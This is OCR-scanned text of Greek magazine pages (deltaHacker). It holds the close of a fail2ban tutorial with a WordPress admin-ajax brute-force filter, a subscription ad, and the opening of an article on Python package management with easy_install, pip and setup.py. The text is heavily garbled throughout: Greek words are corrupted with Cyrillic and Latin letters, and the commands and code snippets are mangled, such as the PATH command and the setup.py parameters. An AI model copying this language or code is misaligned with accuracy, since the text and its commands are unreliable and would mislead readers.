failregex - ^«HOST» - -.*POST /wp-admin/admin-ajax.php.*$ 


Н πρώτη ενότητα φροντίζει για την ενσωμάτωση κάποιων γενικὠν ορισμών που 
απαιτούνται σε όλα τα φίλτρα. Αν δημιουργήσετε Ta біка σας φίλτρα, µπορείτε (kai 
πρέπει) να την αντιγράψετε αυτούσια. Н ουσία βρίσκεται στη δεύτερη ενότητα. Ta 
φίλτρα βοηθούν στο ξεσκαρτάρισµα των περιεχομένων των αρχείων καταγραφἠς, 
ue τη χρήση κανονικών εκφράσεων (regular expressions). Κάθε φίλτρο περιλαμβάνει 
δύο regular expressions: Το ἑνα ονομάζεται failregex και βοηθά στον εντοπισμό των 
συνδέσεων που υποψιαζόμαστε OT! αποτελούν μέρος µιας επίθεσης. To ἄλλο regular 
expression ονομάζεται ignoreregex και Вопда στον εντοπισµὀ των συνδέσεων που 
εἶμαστε σίγουροι ότι “беу“ ανήκουν σε επίθεση. Στο σενάριο που εξετάζουμε, opi- 
caue μόνο το failregex. Σχηματίσαμε το κατάλληλο regular expression λαμβάνοντας 
υπόψη τον τρόπο λειτουργίας του WordPress και τα ιδιαιτερα χαρακτηριστικἁ TOU 


E 


HN- pvar@crunchbang: /etc/fail2ban/filter.d = ох 
pvarécrunchbang:/etc/fail2ban/filter.d$ ls -lh 

total 124K 

-rw-r--r-- l root root 230 Jul 4 17:07 ajaxlogin.conf 
-rw-r--r-- l root root 767 Jun 12 2013 apache-auth.conf 
-rw-r--r-- 1 root root 2.4K Nov 28 2011 apache-badbots.conf 
-rw-r--r-- 1 root root 352 Jun 12 2013 apache-common.conf 
-rw-r--r-- l root root 758 Jun 12 2013 apache-nohome.conf 1 
-rw-r--r-- 1 root root 904 Jun 12 2013 apache-noscript.conf 
-rw-r--r-- 1 root root 580 Jun 12 2013 apache-overflows.conf 
-rw-r--r-- l root root 1.2K Nov 28 2011 common.conf 
-rw-r--r-- 1 root root 610 Nov 28 2011 courierlogin.conf 
-rw-r--r-- 1 root root 585 Nov 28 2011 couriersmtp.conf 
-rw-r--r-- 1 root root 1006 Nov 28 2011 cyrus-imap.conf 
-rw-r--r-- 1 root root 735 Nov 28 2011 dovecot.conf 
-rw-r--r-- 1 root root 1.7K Nov 28 2011 dropbear.conf 
-rw-r--r-- 1 root root 607 Nov 28 2011 exim.conf 

-rw-r--r-- 1 root root 441 Nov 28 2011 gssftpd.conf 
-rw-r--r-- 1 root root 397 Nov 28 2011 lighttpd-fastcgi.conf 
-rw-r--r-- 1 root root 1007 Nov 28 2011 named-refused.conf 
-rw-r--r-- 1 root root 867 Nov 28 2011 pam-generic.conf 
-rw-r--r-- 1 root root 867 Nov 28 2011 php-url-fopen.conf 
-rw-r--r-- 1 root root 585 Nov 28 2011 postfix.conf 
-rw-r--r-- 1 root root 860 Nov 28 2011 proftpd.conf 
-rw-r--r-- 1 root root 803 Nov 28 2011 pure-ftpd.conf 
-rw-r--r-- 1 root root 600 Nov 28 2011 qmail.conf 


Στον κατάλογο /etc/fail2ban/filter.d υπάρχει Eva αρχείο yia κάθε 
φίλτρο rou fail2ban. Τα φίλτρα βοηθούν στον εντοπισμό των 
πιθανὰ επικίνδυνων συνδέσεων και υλοποιούνται µε τη βοήθεια 
κανονικών εκφράσεων. 


67 


@KER 


ÁN 


site. Αφενός, то WordPress διαχειρίζεται Ta AJAX transactions µέσω rou αρχείου 
/wp-admin/admin-ajax.php. Афетёрос, ra credentials yia τη σύνδεση μεταδίδονται 
ре αιτήματα POST. Ως εκ τούτου, каде χρήστης nou προσπαθεἰ уа συνδεθεἰ στο site 
αποστέλλει Eva αἰτημα POST προς την τοποθεσία http://my-site/wp-admin/admin- 
ajax.php. Όταν o web server nou φιλοξενεί ro site καταγράφει ra бхетіка αιτήματα, 
παραλεἰπει το прото τμῆμα rou URL (ro http://my-site), καθώς θεωρείται αυτονόη- 
то. Έτσι, για να εντοπίσουµε τους χρήστες που προσπαθούν να συνδεθούν στο site 
συγκροτήσαμε το ακόλουθο regular expression: 


failregex = ^«HOST» - -.*POST /wp-admin/admin-ajax.php.*$ 


Едо το μόνο nou πρέπει να σημειώσουμε εἶναι η χρήση тас ειδικἠς λέξης «HOST». 
Ме αυτἠ τη λέξη υποδεικνύουμε σε ποιο σημείο των γραμμῶν rou log αναφέρεται η 
διεύθυνση του εκάστοτε χρήστη. Όπως αντιλαμβάνεστε, аот η πληροφορία εἶναι 
κρίσιμη yia τη λειτουργία του fail2ban. Σε прото επἰπεδο αξιοποιείται yia τη διά- 
κριση μεταξύ των διαφορετικών χρηστῶν που συνδέονται στο μηχάνημα, ενώ σε 
δεύτερο επἰπεδο Χρησιμοποιείται για το µπλοκάρισµα των επιτιθέµενων µέσω TOU 
firewall. 


Επίλογος 


Πιστεύουμε ὁτι µετά апо ὁσα συζητήσαμε ἐχετε αποκτήσει µια καλἠ αἰσθηση του 
τρόπου λειτουργίας του fail2ban. Σε γενικὲς γραμμὲς, προκειµένου va προφυλάξου- 
µε ἐναν μηχανισμὀ του συστήματος апо ric απανωτὲς συνδέσεις µιας επἰθεσης brute 
force, πρέπει прота va συγκροτήσουμµμε ёха jail εντὸς του jail.local. Στη συνέχεια, 
χρησιμοποιώντας τις κατάλληλες κανονικὲς εκφράσεις οφείλουμε να δημιουργήσου- 
ре Eva φίλτρο yia τον εντοπισμὀὸ των ὑποπτων συνδέσεων. Παρεμπιπτόντως, αν δεν 
έχετε ασχοληθεἰ µε ra regular expressions, θα ἦταν χρήσιμο να διαβάσετε τα σχε- 
тіка ардра στα τεύχη 021, 022, 023 και 024. Τέλος, yia να ξεκινήσουμε το fail2ban 
арке! να δώσουμε кайт! τέτοιο: 


sudo service fail2ban start 


Κάπου εδὠ θα σας αφήσουμε va απολαύσετε την πολύτιμη δράση του — вібіка για 
TOV server σας. Αν θέλετε να προφυλάξετε ша δηµοφιλἠ υπηρεσία, ὁπως το SSH, 
δεν θα χρειαστεἰ уа πραγματοποιήσετε καμία επέμβαση. Μπορείτε апла va εγκατα- 
στἠσετε то fail2ban και va το ξεκινήσετε αμέσως. Εμεὶς πάντως ευχόμαστε να ἐχετε 
πολύ πιο προχωρημένους στόχους, για να μπορέσετε va εκτιµήσετε περισσότερο την 
ευελιξία του fail2ban ;) 
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To deltaHacker είναι το ένα και μοναδικό 
περιοδικό µε θεματολογία το ethical 
hacking, та δίκτυα και την ασφάλεια, τον 
προγραμματισμό και τα ηλεκτρονικά. 


Το deltaHacker δεν γυρνάει εδώ κι εκεί στα 
περίπτερα, αλλά για τρίτη χρονιά στη σειρά 
έρχεται κατευθείαν σ' εσάς. 


Αν είστε από εκείνους που δεν βλέπουν τον 
υπολογιστή τους шс άλλη µια οικιακή συσκευή 
και δεν αντιμετωπίζετε το Internet ως ένα 
δίκτυο που αρχίζει και τελειώνει µε το Facebook 
και то Twitter, τότε είναι 109% βέβαιο ότι θα 
αγαπήσετε το deltaHacker, καθώς κι ότι θα 
θέλετε την παρέα του κάθε µήνα. 


Παραγγείλετε τώρα µία από τις συµφέρουσες 
συνδρομές από το 
http://deltahacker.gr/pdf12order 
(ηλεκτρονική έκδοση) 

ή από το 

http://deltahacker.gr/order 

(έντυπη έκδοση, έως το τεύχος 019) 


Σηµείωση: Την ύλη όλων των τευχών που 
έχουν κυκλοφορήσει WG τώρα µπορείτε να τη 
βλέπετε στο 


deltahacker.g r/category/magazine-issues 
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Βγάλτε βόλτα την Python! [μέρος 1] 


Μην ανησυχείτε, δεν προτρέπουµε τους κατόχους αληθινών φιδιών να 
τα βγάλουν στο δρὀµο. Στη γλὠσσα Python αναφερόμαστε, που µας 
συντροφεύει σε ὀλες σχεδὸν τις προγραμματιστικὲἐς περιπέτειες. Μόνο που 
οτιδήποτε γράφουμε σ' αυτήν, στηρἱζεται στις βιβλιοθήκες nou ἐχουμε 
εγκαταστήσει στο μηχάἁνημά µας και δεν εἶναι εὔκολο οι εφαρμογἑὲς µας va 
τρέχουν οπουδήποτε "out of the box". Σε auró ro ардро θα кауоцне Eva 
прото βήμα yia την ευκολότερη διακίνηση rov προγραμμάτων µας. Θα 
εξετάσουμε μεθόδους για την εὐκολη προσθαφαΐρεση βιβλιοθηκών, ενώ θα 
μάθουμε va κατασκευάζουµε και та біка µας "πακέτα" µε κὠδικα... 
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Н Python θεωρεἰται апо πολλούς σαν µια γλὠσσα hacker-friendly κι αυτὸ δεν oup- 
βαίνει τυχαία. Το συντακτικὀ της εἶναι апло, καθαρὸ και κατανοητὀ, ενώ υπάρχουν 
κι αμέτρητες βιβλιοθήκες nou απλοποιούν ὁλες τις ауіарёс εργασἰες. Ἔτσι, µε τη 
βοἠθειἁ της μπορούμε να γράφουμε προγράμματα στα γρήγορα, εστιάζοντας μόνο 
στο πρὀβλημα που θέλουμε каве φορά να λύσουμε. Н πληθώρα των βιβλιοθηκών, 
όμως, бе συνδυασμὀ µε τη "βιοποικιλότητα" που παρουσιάζουν τα συστήματα στα 
οποία τρέχει o interpreter της γλὠσσας, δημιουργεὶ Eva μικρὀ провлпра. Εἶναι πολύ 
εὐκολο να πελαγώσουμε µε τις εγκατεστημένες βιβλιοθήκες και τις εκδόσεις της 
καθεμίας, evo ορισμένες φορὲς η χειροκίνητη εγκατάσταση κάποιας βιβλιοθήκης 
μπορεί να παρουσιάσει προβλήματα και να µην ολοκληρωθεί. Ως εκ τούτου, Eva 
πρὀγραμμα που γράψαμε κι εκτελἑέσαµε µε επιτυχία στο δικὀ µας σύστημα, δεν εἶναι 
σίγουρο Ori θα τρέξει και σε κάθε алло μηχάνημα. Па να εξασφαλίσουµε την επιτυ- 
χημένη εκτέλεση, πρέπει προηγουμένως να εξασφαλἰσουµε και την παρουσία των 
συγκεκριμένων εκδόσεων των βιβλιοθηκών που αξιοποιούνται апо τον κὠδικά µας. 


Όπως αντιλαμβάνεστε, 000 εμβαθύνουμε στη γλὠσσα και δημιουργούμε πιο σύνθε- 
τα προγράµµατα που στηρἱζονται σε περισσότερες βιβλιοθήκες, το ζήτημα περιπλέἑ- 
κεται. Σε αυτό το ардро θα ασχοληθούμε µε τις μεθόδους για την EUKOAN προσθα- 
@aipeon βιβλιοθηκών και γενικότερα µε τη διαχεἰρισή τους. Επιπρόσθετα, θα δούμε 
noc μπορούμε va πακετάρουμε τις δικές µας βιβλιοθήκες για να τις διανέµουµε σε 
κάθε ενδιαφερόμενο. 


Συστήματα διαχείρισης βιβλιοθηκών 


Υπάρχει κανένας ανἀμεσά µας nou να µην ἐχει χρησιμοποιήσει ἑστω και µια διανομὴ 
Linux; Μάλλον ὁὀχι Επομένως, ὁλοι γνωρίζουμε την £vvoia των συστηµάτων біа- 
χείρισης πακέτων (package management system). Πα παράδειγμα, οι διανομές που 
βασίζονται στο Debian διαθέτουν το εργαλείο dpkg ὁπως επἰσης то apt και ἄλλα, 
ra опоіа διαχειρίζονται πακέτα DEB. Апо την ἄλλη, διανομὲς ὁπως το Fedora, то 
OpenSUSE και ro CentOS διαθέτουν еруалеіа σαν ro yum, το YaST то Zypper και 
ἄλλα, που διαχειρίζονται πακέτα RPM. E, λοιπὸν, кайт! παρόμοιο ισχύει και για την 
Python. Н αγαπημένη µας γλὠσσα διαθέτει δύο εργαλεία που επιτρέπουν την npo- 
σθαφαἱρεση και τη διαχείριση των εγκατεστηµένων βιβλιοθηκών µε ευκολία. Ava- 
Qepoópaore στο παλιὸ kai σχετικἁ απλὀ easy. install, καθώς και στο νεότερο kai πιο 
ισχυρὀ pip. Τα πακέτα που διαχειρίζεται το прото ονομάζονται Python Eggs (αρχεία 
EGG), ενώ аста που διαχειρίζεται το δεύτερο ονομάζονται Wheel (αρχεία WHL). 
Μάλιστα, ὁπως συμβαίνει και µε τις διανομές Linux, τα διάφορα πακέτα των βιβλιο- 
Onkov βρίσκονται συγκεντρωμένα σε Eva αποθετἠριο (repository) που ονομάζεται 
PyPI (Python Package Index). 


To παλιὀ και απλὀ 


Па την εγκατάσταση του easy install арке! va ретаВоўце στη διεύθυνση https:// 
bootstrap.pypa.io, va κατεβάσουµε то script ez setup.py και να το εκτελἐσουμε. 
Мета апо αυτή την απλούστατη διαδικασία, ro easy install εἶναι ἑτοιμο προς χρήση. 
Στα συστήματα µε Windows, όμως, кало θα ἦταν να πραγµατοποιἠήσουµε Eva ακόµα 
βήμα, yia την ευκολότερη χρήση rou εργαλείου. Συγκεκριµένα, прёп va тропо- 
ποιήσουμε τη μεταβλητὴ περιβάλλοντος PATH, фоте να περιλαμβάνει τη διαδρομή 
προς ro easy install. Σημειώστε бт! TO εν λόγω script τοποθετείται στον κατάλογο 
Scripts, στην τοποθεσία ὁπου ἐχει εγκατασταθεἰ και η Python. Αν υποθέσουμε От! 
έχουµε εγκαταστήσει την Python στον κατάλογο C:\Python27, το εργαλεἰο διαχεἰρι- 
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C:\Users\user\AppData\Local\Python\App>cd Scripts 


C:\Users\user\AppData\Local\Python\App\Scripts>easy_install-2.7.exe gr2gl 
Searching for gr2gl 

Reading http://pypi.python.org/simple/gr2gl/ 

Best match: gr2gl 0.1 

Downloading https://pypi.python.org/packages/source/g/gr2gl/gr2gl-0.1.tar.gzitmd 
-a109271ff8359fc6b0fd5545e6f92987 

Processing gr2gl-0.1.tar.gz 

Running gr2gl-@.1\setup.py -q bdist egg --dist-dir c:\users\user\appdata\local\t 
emp\easy_install-xec_4g\gr2g1-0.1\egg-dist-tmp-yaqpkl 

warning: install lib: 'buildMib' does not exist -- no Python modules to install 


zip safe flag not set; analyzing archive contents... 
Adding gr2gl 0.1 to easy-install.pth file 
Installing gr2gl script to C:\Users\user\AppData\Local\Python\App\Scripts 


Installed c:\users\user\appdata\local\python\app\lib\site-packages\gr2g1-0.1-py 
.7.egg 

Processing dependencies for gr2gl 

Finished processing dependencies for gr2gl 


C:\Users\user\AppData\Local\Python\App\Scripts> 


Н εγκατάσταση και η αναβάθµιση βιβλιοθηκών µέσω του 

easy install πραγματοποιείται µε µεγάλη ευκολία. Ωστόσο, та 
μηνύματα που εμφανίζει ro πρὀγραμμα όταν προκύπτουν офал- 
рата εἶναι εντελώς ακαταλαβίστικα kai δεν βοηθάνε καθόλου το 
χρήστη. Και σαν να µην έφτανε αυτό, η απεγκατάσταση βιβλιο- 
θηκών ие то easy setup δεν εἶναι πλήρως αυτοματοποιημένη και 
απαιτεί τη χειροκίνητη διαγραφή αρχείων! 


σης βιβλιοθηκὠν θα ἐχει τοποθετηθεἰ στη θέση C:\Python27\Scripts. Па va ενηµε- 
ρώσουμε κατάλληλα τη μεταβλητὴ PATH, аркеі να κάνουμε δεξὶ κλικ στο εικονίδιο 
"Υπολογιστής" και να επιλέξουμε το "Ιδιότητες". Στο παράθυρο που εμφανίζεται епі- 
λέγουμε το "ρυθμίσεις συστήματος για προχωρημένους" και στο νέο (!) παράθυρο 
που εμφανίζεται, πατάμε то κουμπὶ "Μεταβλητὲς περιβάλλοντος". Апо exei και πέρα, 
νομίζουμε бт! η διαδικασία εἶναι προφανής. Аркеі va εντοπἰσουµε τη μεταβλητή 
PATH και va ἈπροσθέσουμεΧ στην τιμὴ της (string) τη θέση rou easy install. Ἕνας 
πολύ πιο γρήγορος τρόπος yia va επέµβουµε στην τιμὴ της PATH εἰναι va χρησιμο- 
ποιήσουμε τη γραμμὴ εντολών кі апо Eva παράθυρο Command Prompt να δώσουμε 
κάτι τέτοιο: 


path-z4PATH4;C:NPython27NScripts 


Ωστόσο, αυτὴ η τροποποίηση δεν θα εἶναι μόνιμη και θα ισχύει μόνο μέχρι την επὀ- 
µενη επανεκκίνηση του συστήματος. Όπως και να 'χει, μετὰ την ενηµέρωση της 
μεταβλητἠς PATH μπορούμε να χρησιμοποιούμε το easy install апо οπουδήποτε και 
χωρὶς να δηλώνουμε τη θέση rou. Н προσθήκη νέων βιβλιοθηκών θα праүрато- 
noleital, πλέον, πανεύκολα. Па την εγκατάσταση ενὸς πακέτου που βρίσκεται στο 
repository ΡΥΡΙ, арке! να δώσουμε кат! τέτοιο: 
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easy_install library-to-be-installed 


Av o δημιουργὀς της βιβλιοθήκης δεν την ἐχει προσθέσει στο ΡΥΡΙ kai тпу προσφέρει 
µόνο ως ἑνα συμπιεσμένο πακέτο, μπορούμε να χρησιμοποιήσουμε то σχετικὀ URL: 


easy install http://some-site.com/library-to-be-installed.tgz 


Τέλος, av η βιβλιοθήκη διανέμεται ως πακέτο EGG, μπορούμε va το κατεβάσουμε 
στον υπολογιστή µας και να εκτελἐσουµε TO еаз5у install κάπως ἐτσι: 


easy install library-to-be-installed.egg 


Σε каде περίπτωση, ro easy install εγκαθιστά τη βιβλιοθήκη στον καθιερωμένο 
(default) κατάλογο ónou τοποθετούνται οι βιβλιοθήκες "τρίτων κατασκευαστών". 
Πρόκειται yia τον κατάλογο Lib/site-packages, ο οποίος βρίσκεται στην τοποθεσία 
όπου έχουμε εγκαταστήσει την Python. 


Εκτὸς апо την εγκατάσταση, то easy install αναλαμβάνει και την αναβάθμιση των 
βιβλιοθηκών. Па το σκοπὀ αυτό προσφέρεται η παράμετρος --upgrade, που πρέπει 
να τοποθετηθεἰ πριν апо το ὀνομα της βιβλιοθήκης που θέλουμε να αναβαθμιστεί: 


easy install --upgrade library-to-be-upgraded 


Όπως βλέπετε, ro easy. install εἶναι αρκετά εὐχρηστο ki απλοποιεἰ σε μεγάλο βαθμό 
τη διαδικασία εγκατάστασης και αναβάθµισης των βιβλιοθηκών. Αν θέλετε να μάθετε 
περισσότερα για τις λειτουργίες που προσφέρει και τον τρόπο χρήσης rou, μπορεὶ 
να διαβάσετε τις οδηγἰες στη διεύθυνση pythonhosted.org/setuptools/easy install. 
html. Πάντως, τα μηνύματα που εμφανίζει το проүрарра ὁταν προκύπτουν сфал- 
рата δεν εἶναι καθόλου διαφωτιστικἀ. Επιπρὀσθετα, στην απεγκατάσταση βιβλιο- 
Onkov θα λέγαμε бт! χωλαίνει, αφού αφαιρεί τις σχετικὲς εγγραφὲς апо τη "βάση 
δεδομένων" που διατηρεί αλλά “беу” διαγράφει ra αντίστοιχα αρχεία! Τα παραπάνω 
δεν σημαίνουν Ori πρὀκειται για Eva προβληματικὀ και ахрпото εργαλείο. Νομίζουμε 
όμως бт! αξίζει να γνωρίσουμε και την εναλλακτική λύση... 


Το νέο και ενισχυμένο 


Па την εγκατάσταση rou pip προσφἑρεται Eva script µε το буора get-pip.py, то 
onoio μπορούμε va κατεβάσουμµε апо την ἰδια διεύθυνση nou κατεβάσαµε και то 
script εγκατάστασης rou easy install (https://bootstrap.pypa.io). Εναλλακτικά, av 
χρησιμοποιούμε капоа διανομὴ rou Linux nou βασίζεται στο Debian, аркі va δώ- 
OOUHE кат! TETOIO: 


sudo apt-get install python-pip 
Ισοδύναμα, σε ша διανομή не το εργαλείο yum аркі αυτό: 
sudo yum install python-pip 


Όπως και στην περίπτωση του easy install, η εγκατάσταση rou pip ora Windows δεν 
τροποποιεἰ καθόλου τη µεταβλητὴή PATH του συστήματος. Επομένως, αν θέλουμε 
va καταστήσουμε τη χρήση rou εργαλείου ευκολότερη, πρέπει να ενημερώσουμε 
το περιεχόµενο της PATH χειροκίνητα. Σημειώστε ὁτι το pip εγκαθἰσταται στον ἰδιο 
ακριβώς φάκελο µε ro easy. install (/path to python/Scripts). 


Па την εγκατάσταση µιας βιβλιοθήκης µέσω rou pip, η διαδικασἰα εἶναι εξίσου απλἠ. 
Απαιτείται µόνο то буора της βιβλιοθήκης και η παράμετρος install: 


pip install library-to-be-installed 
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C:\Windows\system32\cmd.exe = 
-- 


C:\Users\user\AppData\Local\Python\App>python.exe Scripts/get-pip.py 
Downloading/unpacking pip 

Installing collected packages: pip 

Successfully installed pip 

Cleaning up... 


C: \Users\user\AppData\Local\Python\App> 


Το εργαλείο pip αποτελεί το διάδοχο rou easy install kai εγκα- 
θίσταται στο σύστημα πανεύκολα. Αρκεί va τρέξουµε ro script 
"get-pip.py", που μπορούμε va κατεβάσουµε апо τη διεύθυνση 
https://bootstrap.pypa.io 


Av θέλουμε va εγκαταστήσουμε ша συγκεκριμένη ἐκδοση κάποιας βιβλιοθήκης ki 
ὀχι апла την πιο πρόσφατη, аркеі να δώσουμε κάτι τέτοιο: 
pip install library-to-be-installed--some-version-number 


Αν έχουμε κατεβάσει τη βιβλιοθήκη σε πακέτο wheel (αρχείο WHL), μπορούμε va την 
εγκαταστήσουμε εξίσου еўкола: 


pip install library-to-be-installed.whl 


Па va δούμετις βιβλιοθήκες nou ¿xouv εγκατασταθεἰ μέσω rou pip, δεν έχουμε пара 
va εκτελέσουµε ro πρὀγραμμα µε την εντολὴ list: 


$ pip list 

lxml (3.3.4) 
matplotlib (1.3.1) 
numpy (1.8.1) 
pandas (0.11.0) 
PIL (1.1.7) 


рір (1.5.6) 


74 


Вуалте Βόλτα την Python! [µέρος 1] 


A4LLA LALLA AAA A AA AAA A AA A LA A A AAA Î A AA AAA AL A AAA A A AAA A LAA AA A A AA LAA AA Î A A Î A A Î Î С С LÎ LLL LAL 


C:\Users\user\AppData\Local\Python\App\Scripts>pip install gr2gl 
Downloading/unpacking gr2gl 

Downloading gr2gl-0.1.tar.bz2 

Running setup.py (path:c:\users\user\appdata\local\temp\pip build user Mgr2glVs 
letup.py) egg info for package gr2gl 
| 


| 
Installing collected packages: 
Running setup.py install for 


successfully installed gr2gl 
ICleaning up... 


Н εγκατάσταση και η αναβάθµιση βιβλιοθηκών µε τη βοήθεια rou pip 
αποτελούν απλούστατες διαδικασίες. Επιπρόσθετα, τα μηνύματα που 
εμφανίζει το πρὀγραμμα εἰναι πάντοτε ιδιαίτερα κατατοπιστικά. 


Όπως βλέπετε στις παραπάνω γραμμές, η εκτἐλεση του pip µε αυτόν τον τρόπο 
εμφανίζει τα ονόματα των εγκατεστηµένων βιβλιοθηκών, καθώς και τον αριθµό £K- 
δοσης της кадеріас. Па va δούµε µόνο τις βιβλιοθήκες που χρειάζονται αναβάθµιση, 
арке! να επιστρατεύσουμµε και την παράμετρο --outdated: 


$ pip list --outdated 
lxml (Current: 3.3.4 Latest: 3.3.5) 
pandas (Current: 0.11.0 Latest: 0.14.1) 


Νομίζουμε ὁτι το αποτέλεσμα της εκτέλεσης εἶναι απὀλυτα διαφωτιστικὀ. Па την 
αναβάθμιση µιας βιβλιοθήκης προσφέρεται η παράμετρος --upgrade, ὁπως και στην 
περίπτωση rou easy. install. Па παράδειγµα, η αναβάθμιση της βιβλιοθήκης Ixml 
επιτυγχάνεται ως εξἠς: 


pip install --upgrade lxml 


Па περισσότερες плпрофоріес бхетіка µε µια εγκατεστημένη βιβλιοθήκη μπορούμε 
να χρησιμοποιήσουμε την εντολἠ show: 


$ pip show matplotlib 

Name: matplotlib 

Version: 1.3.1 

Location: c:\python27\lib\site-packages 

Requires: numpy, python-dateutil, tornado, pyparsing 


Av ауасптаре µια βιβλιοθήκη χωρὶς να yvopiCouus ro ακριβὲς της ὀνομα, μπορούμε 
va πραγµατοποιήσουµε µια αναζήτηση oro αποθετἠριο ΡΥΡΙ χρησιμοποιώντας την 
εντολἠ search: 


$ pip search phpy 
phpydaemon - Webservice for calling long-running PHP 


functions as subprocesses 
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phpy - A simple way to call legacy PHP functions 
from Python 


Τέλος, yia την απεγκατάσταση µιας βιβλιοθήκης арке! να χρησιμοποιήσουμε την 
EVTOAN uninstall: 


pip uninstall library-to-be-removed 


Хпітіка αυγά! 


Φυσικά, ектос апо ra ἐτοιμα πακέτα που μπορούμε να βρούμε oro αποθετἠριο PyPI 
ἡ kai στο διαδίκτυο γενικότερα, μπορούμε να δημιουργήσουμε και та біка µας. Με 
αυτόν τον τρόπο μπορούμε va біауёносне βιβλιοθήκες ἡ και oAókAnpa проурар- 
рата, µε ευκολία και σε κάθε ενδιαφερὀµενο! Ας υποθέσουμε, λοιπόν, ὁτι ἐχουμε 
γράψει ша ολοκληρωμένη εφαρμογἠ nou απαρτίζεται апо διάφορα αρχεία κὠδικα, 
μερικὲς εικὀνες και κάποια αρχεία κειμένου. Στη συνέχεια θα δούμε noc μπορούμε 
va πακετάρουµε ro δημιοὐργημὰ µας бе Eva αρχείο EGG. Με auro το αρχείο και τη 
βοήθεια rou easy. install, το καμάρι µας θα εγκαθἰσταται пауеўкола σε οποιοδήποτε 
σύστημα... 


O σχηµματισμὀς του αρχείου EGG πραγματοποιείται εὐκολα апо διαδικασὶίες που nE- 
ριλαμβάνει η βιβλιοθήκη setuptools. Av αναρωτιέστε nou θα βρεἰτε τη συγκεκριμένη 
βιβλιοθήκη, δεν υπάρχει κανένας λόγος ανησυχίας. Στην ἰδια βιβλιοθήκη βασἰζεται 
TO easy install αλλά και το pip. Επομένως, av ἐχετε εγκαταστήσει капоіо апо та 
δύο εργαλεἰα, εἶναι σίγουρο Ori ἐχει еукатастадеі και η βιβλιοθήκη setuptools. Па 
va σχηµατιστεἰ το πακέτο εγκατάστασης EGG, πρέπει να προσδιορίσουµε τα αρχεία 
που απαρτἰζουν την εφαρμογἠ нас, το ὀνομά της, την ἐκδοση, το αν η λειτουργία 
της απαιτεὶ την παρουσία κάποιων βιβλιοθηκών к.а. Όλες αυτές οι πληροφοριες To- 
ποθετούνται o' ἑνα αρχείο που ката παράδοση ονομάζεται "setup.py". Ας δούµε та 
περιεχόμενα ενὸς τἐτοιου αρχείου: 


from setuptools import setup, find packages 


setup( 
name - 'my great app', 
version = ‘version number', 
description = ‘a short description’, 
author = ‘my папе", 
author email = 'my_email@coolmail.com', 
url = 'http://www.my-cool-site.com/', 
license = ‘License agreement’, 


SEEN [хә ЛӘ ex | πρ “ioe == ο са, “Π|95 se 15] 
packages = find packages( src'), 
package dir = SREY 
ру modules = ['scripti1', 'script2'], 
package data ОСОРЕ: 
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[ κ. C:A\Windows\system32\cmd.exe | oh ES 


С: \Users\user\AppData\Local\Python\App\Scripts>pip list 
gr2gl (0.1) 
lxml (3.3.4) 


pygoocanvas (0.14.2) 


pygtk (2.24.0) 
pygtksourceview (2.10.1) 


C:\Users\user\AppData\Local\Python\App\Scripts>pip uninstall gr2gl 
Uninstalling gr2gl: 
c:\users\user\appdata\local\python\app\lib\site-packages\gr2g1-0.1-py2.7.egg-i 
nfo 
c:\users\user\appdata\local\python\app\scripts\gr2g1 
Proceed (y/n)? y 
Successfully uninstalled gr2gl 


C:\Users\user\AppData\Local\Python\App\Scripts> 


" 


Το εργαλείο pip μπορεί να παραθέσει τις εγκατεστημένες βιβλιοθήκες, va 
τσεκάρει ποιες χρειάζονται αναβάθμιση, να πραγματοποιήσει αναζητήσεις 
στα περιεχόμενα rou repository PyPI к.а. То μεγάλο του προσόν, όμως, 
έναντι TOU еа5у install, ἐγκειται στην ικανότητα ολοκληρωτικής απομά- 
κρυνσης των βιβλιοθηκών που θέλουμε va απεγκαταστήσουμε. 


Όπως βλέπετε, το αρχείο setup.py апотелеі Eva μικρὸ npóypaupa σε Python. Στην 
πρώτη γραμμή ενσωματώνουμε τις συναρτήσεις setup kai find packages апо τη 
βιβλιοθήκη setuptools. Στη συνέχεια πραγματοποιούµε µια κλήση της συνάρτησης 
setup. Н εκτἐλεση αυτής της συνάρτησης ἐχει σαν αποτέλεσµα τη δηµιουργία του 
πακέτου εγκατάστασης. Τα δεδομένα που περιγράφουν την εφαρμογῆ рас, το ὀνο- 
μα, την ἐκδοση, τα αρχεία nou την απαρτίζουν к.Лп., δίνονται ως παράμετροι στην 
εν λὀγω συνάρτηση. Οι πρὠτες παράμετροι nou φαίνονται στο παρἀδειγμὰ µας εἶναι 
μάλλον απλὲς και δεν χρειάζονται ιδιαίτερη επεξήγηση. Το ενδιαφέρον κομμάτι EKI- 
và µε την παράμετρο install, requires. Εκεἰ OnAWVOUHE τις βιβλιοθήκες που EVOEXE- 
ται να απαιτεἰ η εφαρμογῆ µας yia την EKTEAEON της — τα λεγόμενα dependencies. 
Όπως βλέπετε, σε αυτή την παράμετρο μπορούμε να δώσουμε τόσο τα ονόματα TOV 
απαιτούμενων βιβλιοθηκών, боо και τις αντίστοιχες εκδόσεις, εφὀσον κάτι τέτοιο 
εἶναι avaykaio. 
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Setup deltaHacker - python package test-10 eae жо» A 


deltaHacker - python package test-1.0 


This Wizard will install deltaHacker - python package test on your computer. 
Click Next to continue or Cancel to exit the Setup Wizard. 


Author: multiPetros 
Description: А test win installation package for deltaHacker 
Name: deltaHacker - python package test 
Url: http: Z/www.multipetros.gr/ 
PYTHON Version: 1.0 
Powered 


Built Sat Jul 26 17:18:19 2014 with distutils-2.7.6 


Ta setuptools της Python μπορούν να δημιουργήσουν εκτελέσι- 
ра πακέτα που θα περιλαμβάνουν την εκάστοτε βιβλιοθήκη µας 
ка! θα πραγματοποιούν την εγκατάστασή της. Αναφερόμαστε σε 
εκτελέσιμα των Windows! Αυτός ο τρόπος διανομής των βιβλιοθη- 
κὠν µας μοιάζει αρκετά δελεαστικός, αλλά περιορίζει δραστικά TO 
Κοινό µας. Εξάλλου, υπάρχουν και περιπτώσεις κατά τις οποίες η 
αυτοματοποιημένη εγκατάσταση στα Windows αποτυγχάνει... 


Ακολουθεἰ η παράμετρος packages, στην onoia δηλώνουμε τα επιµέρους "πακέτα" 
που απαρτἰζουν την εφαρμογἠ µας. Μιλώντας για "πακέτα" εδὠ, αναφερόμαστε σε 
ξεχωριστούς καταλόγους µε κὠδικα. Μια εφαρµογἠ ἡ µια βιβλιοθήκη, βλέπετε, ev- 
δέχεται να απαρτίζεται апо επιµέρους προγράμματα και, τέλος πάντων, τα αρχεία µε 
κὠδικα που την απαρτἰζουν εἶναι πιθανὸ να βρίσκονται σε Eva δέντρο καταλὀγων. 
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Στην παράμετρο packages πρέπει va δηλώσουμε όλα τα αρχεία µε κὠδικα. Όπως 
